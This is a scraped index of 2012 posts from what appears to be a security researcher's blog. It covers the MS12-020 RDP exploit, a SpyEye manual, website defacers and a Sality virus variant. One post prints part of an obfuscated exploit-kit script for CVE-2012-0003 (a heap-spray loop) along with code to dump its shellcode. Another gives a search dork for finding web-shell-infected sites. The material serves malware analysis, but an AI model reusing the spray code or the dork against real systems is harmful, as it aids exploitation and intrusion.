RDP exploit related ……. MS12-020
Posted in Uncategorized on March 16, 2012 by ianstarkcSPYEYE Manual ….F-Secure … and ….”VISCOLUL” at 10:31 !!
Posted in Uncategorized on March 13, 2012 by ianstarkcRecently F-Secure posted about Spyeye manual . It seems back in 2011, some one helped other guy to configure Spyeye and linked to this manual. IRC logs are here. …………………………………………………………………………………………………………… b3cfzzw5l
Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…
Posted in Uncategorized on January 31, 2012 by ianstarkcInsert following code at “INSERT” location in original malicious script . remove MIDI exploitation code before execution 
var fpo = new ActiveXObject(“Scripting.FileSystemObject”);
var sc = fpo.OpenTextFile(“c:\\Shellcode.bin”,true);
sc.WriteLine(escape(kpemoez4));
sc.Close();
————————————————————————————
———————————————————————————–
try{alert(a,b,c);}
catch(e)
{
var HrMm7=”d”;
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7=”d”;
delete FJWVzIe1;
“INSERT”
for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}
}
——————————————————————————————-
——————————————————————————————
LOD 0×05
Posted in LOD on February 15, 2010 by ianstarkcThis website , will give you all information about hacked/defaced site . Recently it exposed e2 Lab scam (Earlier associated with Ankit Fadia .. LOL and Double LOL
LOD 0×04
Posted in LOD on February 14, 2010 by ianstarkcIf you’ll analyze web-logs of National Software Reference Library supported by National Institute of Standards and Technology (NIST), US especially at “Technical Information–>Missing Files , there you’ll see lots of RFI (Remote File Inclusion ) exploit attempts. All these files are having the strings which is explained by SANS Storm Center. You know how websites gets hacked ? Here is a sample hacked site . More hacked sites you can find using this Google dork “intitle:FaTaLisTiCz_Fx Fx29SheLL“. Also you can analyse these web-logs and most important your web-logs !! So what you think about FeeLCoMz ?
LOD 0×03
Posted in LOD on February 6, 2010 by ianstarkcWebsites defaced by R3YR3 !!
Both websites are owned by same person ( has taken WHOIS privacy service).
R3YR3 is a member of Indonesian Defacers group . It seems another member , Flyff666 from same group is resposible for Win32.Sality.aa virus as detected by Kaspersky and he himself has given different names like W32.Sarap.B or W32.Amburadul.Virus or has taken code from them. Infected files are here and I think this webserver itself is infected. ( Files are in double extensions , this virus is infecting Image file format like JPG, gif, png etc.)
